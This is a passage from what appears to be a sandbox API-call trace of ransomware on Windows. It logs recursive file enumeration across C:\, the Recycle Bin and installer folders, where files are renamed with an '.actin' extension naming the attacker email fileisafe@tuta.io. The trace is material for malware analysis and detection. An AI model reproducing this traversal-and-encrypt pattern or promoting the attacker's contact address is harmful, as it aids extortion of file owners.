nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPC~1.ACT")) returned 1 [0140.008] FindNextFileW (in: hFindFile=0xaa9050, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPC~1.ACT")) returned 0 [0140.008] FindClose (in: hFindFile=0xaa9050 | out: hFindFile=0xaa9050) returned 1 [0140.009] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30a0060 | out: hHeap=0x26a0000) returned 1 [0140.009] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0140.009] FindClose (in: hFindFile=0xaa93d0 | out: hFindFile=0xaa93d0) returned 1 [0140.009] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3090058 | out: hHeap=0x26a0000) returned 1 [0140.009] FindNextFileW (in: hFindFile=0xaa9010, lpFindFileData=0x2f2fa74 | out: lpFindFileData=0x2f2fa74*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x26a0000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0140.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xaa93d0 [0140.009] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0140.009] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0140.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.010] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.010] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7acb56, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 1 [0140.010] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7acb56, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 0 [0140.010] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.010] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30a0060 | out: hHeap=0x26a0000) returned 1 [0140.010] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0140.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa91d0 [0140.010] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.010] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ac3fed, ftCreationTime.dwHighDateTime=0x1d53298, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0140.010] SetEvent (hEvent=0x29c) returned 1 [0140.010] ResetEvent (hEvent=0x2a0) returned 1 [0140.010] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 1 [0140.010] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 0 [0140.010] FindClose (in: hFindFile=0xaa91d0 | out: hFindFile=0xaa91d0) returned 1 [0140.011] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x30a0060 | out: hHeap=0x26a0000) returned 1 [0140.011] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0140.011] FindClose (in: hFindFile=0xaa93d0 | out: hFindFile=0xaa93d0) returned 1 [0140.011] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3090058 | out: hHeap=0x26a0000) returned 1 [0140.011] FindNextFileW (in: hFindFile=0xaa9010, lpFindFileData=0x2f2fa74 | out: lpFindFileData=0x2f2fa74*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x26a0000, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0140.011] FindNextFileW (in: hFindFile=0xaa9010, lpFindFileData=0x2f2fa74 | out: lpFindFileData=0x2f2fa74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x26a0000, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0140.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName=".", cAlternateFileName="")) returned 0xaa93d0 [0140.091] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="..", cAlternateFileName="")) returned 1 [0140.094] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1025", cAlternateFileName="")) returned 1 [0140.108] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.130] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.130] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7f90d6, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1e82, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.130] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7f90d6, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7f90d6, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7f90d6, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x122f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.130] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7f90d6, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7f90d6, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c81f1bd, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4462, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.130] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7f90d6, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7f90d6, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c81f1bd, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4462, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.130] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.131] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.131] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1028", cAlternateFileName="")) returned 1 [0140.132] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.133] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.133] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c81f1bd, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c81f1bd, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c81f1bd, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x19a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.133] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c81f1bd, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c81f1bd, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ca817a7, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xeea2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.133] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c845691, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c845691, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c845691, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x3862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.133] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c845691, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c845691, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c845691, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x3862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.133] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.134] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x31200a0 | out: hHeap=0x26a0000) returned 1 [0140.134] FindNextFileW (in: hFindFile=0xaa93d0, lpFindFileData=0x2f2f7f0 | out: lpFindFileData=0x2f2f7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1029", cAlternateFileName="")) returned 1 [0140.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.135] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.135] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c845691, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c845691, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c86b502, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf82, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.135] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c86b502, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c86b502, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c86b502, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x13d52, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.135] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c89193d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c89193d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c89193d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.136] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x2f2f56c | out: lpFindFileData=0x2f2f56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c89193d, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c89193d, 